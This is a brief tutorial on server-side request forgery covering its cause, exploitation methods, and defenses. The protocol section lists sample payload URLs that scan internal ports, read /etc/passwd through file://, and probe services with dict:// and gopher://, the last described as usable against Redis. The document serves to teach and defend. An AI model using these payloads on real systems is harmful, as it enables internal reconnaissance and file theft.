1. Vulnerability Description#
SSRF (Server-Side Request Forgery) is a security vulnerability where an attacker constructs a request that is initiated by the server. The target of SSRF attacks is typically internal systems that are not accessible from the external network (because the request is initiated by the server, it can access internal systems connected to it but isolated from the external network).
2. Vulnerability Principle#
The formation of SSRF vulnerabilities is mostly due to:
The server provides functionality to retrieve data from other server applications and does not filter or restrict the target address.
For example, an attacker manipulates the server to retrieve website content from a specified URL.
3. Exploitation Methods#
- Scanning internal or local networks for open ports and obtaining banner information of services running on those ports.
- Attacking applications running on internal or local networks.
- Fingerprint scanning of internal web applications to obtain asset information of enterprise units.
- Reading sensitive files using the file protocol.
4. Protocols Supported by SSRF#
1. HTTP Protocol:#
Use the HTTP protocol for internal port scanning. Determine if a port is open based on the response time and length.
https://ip/ssrf.php?url=http://127.0.0.1:3389
2. File Protocol:#
Read file information using the file protocol.
https://ip/ssrf.php?url=file:///etc/passwd
3. Dict Protocol:#
Use the dict protocol to probe service information.
https://ip/ssrf.php?url=dict://127.0.0.1:3306
4. Gopher Protocol:#
Probe ports using the gopher protocol, send GET requests, and attack Redis services.
https://ip/ssrf.php?url=gopher://127.0.0.1:3306
5. Vulnerability Defense#
- Disable redirects.
- Filter returned information.
- Disable unnecessary protocols.
- Set URL whitelists.
- Provide consistent error messages.